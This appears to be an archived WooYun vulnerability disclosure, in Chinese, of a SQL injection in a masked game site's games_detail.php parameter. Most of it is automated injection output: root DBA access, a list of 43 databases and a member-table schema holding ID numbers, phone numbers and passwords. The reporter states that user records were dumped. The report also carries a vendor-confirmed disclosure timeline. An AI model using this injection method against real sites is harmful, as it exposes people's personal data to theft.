乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-30: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
站点:http://**.**.**.**/注入连接:
http://**.**.**.**/games_detail.php?cid=68
数据库信息:
current user: 'root@localhost'[10:42:49] [INFO] fetching current dcurrent database: 'biz-game'[10:42:50] [INFO] testing if current[10:42:50] [INFO] fetching current ucurrent user is DBA: True[10:42:50] [INFO] fetching databaseavailable databases [43]:[*] beergame[*] beergame_it.lhu[*] bg_mobile_0711[*] bg_mobile_0721[*] bg_mobile_0731[*] bgm[*] bgm_0826[*] biz[*] biz-game[*] bizarena[*] boss_register[*] coo_admin[*] coo_admin_it.lhu[*] csm_register[*] cyl[*] cyl_alpha[*] cyl_gb[*] drupal_739[*] edm[*] edutec_register[*] gwtb[*] happy_farm[*] information_schema[*] limesv_cn[*] limesv_tw_just_stand_by[*] menu[*] mw_register[*] mysql[*] re[*] re_admin[*] re_admin_it.lhu[*] reissue_license[*] restaurateur[*] restaurateur_patch[*] restaurateur_phpbb3[*] sa[*] sa147[*] sa_0804[*] sa_biz_register[*] saranking[*] user_trial[*] vip[*] vip_mobile
member表字段:
Database: biz-gameTable: member[70 columns]+-------------------------------------+--------------+| Column | Type |+-------------------------------------+--------------+| aps | int(11) || arena_b | int(11) || beergame | int(11) || boss | int(11) || bounce_times | int(11) || c_aps | char(1) || c_arena_b | char(1) || c_beergame | char(1) || c_boss | char(1) || c_coo | char(1) || c_csm | char(1) || c_cyl | char(1) || c_ipo | char(1) || c_magnus | char(1) || c_mw | char(1) || c_re | char(1) || c_sa | char(1) || c_vrd | char(1) || check_code | varchar(32) || cid | varchar(10) || cid_validated | char(1) || cname | varchar(16) || coo | int(11) || country_code | varchar(3) || csm | int(11) || cyl | int(11) || dept | varchar(16) || email | varchar(64) || email2 | varchar(64) || email2_validated | char(1) || email3 | varchar(64) || email3_validated | char(1) || email_validated | char(1) || expert | varchar(128) || facebook_id | bigint(20) || home_address | varchar(128) || home_tel | varchar(64) || id | int(11) || import_datetime | datetime || ipo | int(11) || is_admin | char(1) || is_host | char(1) || last_datetime_to_click_email | datetime || last_datetime_to_read_email | datetime || magnus | int(11) || mobile | varchar(64) || mobile_validated | char(1) || mobile_validation_code | int(11) || mobile_validation_remain_sms_times | int(11) || mw | int(11) || nickname | varchar(16) || office_address | varchar(128) || office_fax | varchar(32) || office_tel | varchar(64) || org | varchar(64) || password | varchar(32) || ranking | int(11) || rcrd | text || re | int(11) || remark | text || sa | int(11) || score | int(11) || status | int(11) || temp_plain_password_should_be_clean | varchar(16) || title | varchar(32) || total_times_to_click_email | int(11) || total_times_to_read_email | int(11) || type1 | int(11) || validated_mobile_backup | varchar(64) || vrd | int(11) |+-------------------------------------+--------------+
dump几条数据展示
整理一下:
玩家姓名#玩家Email#身份证号#手机号#地址#学校专业#用户名#密码等可跨裤。。。
已证明
过滤
危害等级:高
漏洞Rank:17
确认时间:2015-12-31 02:23
感謝通報
暂无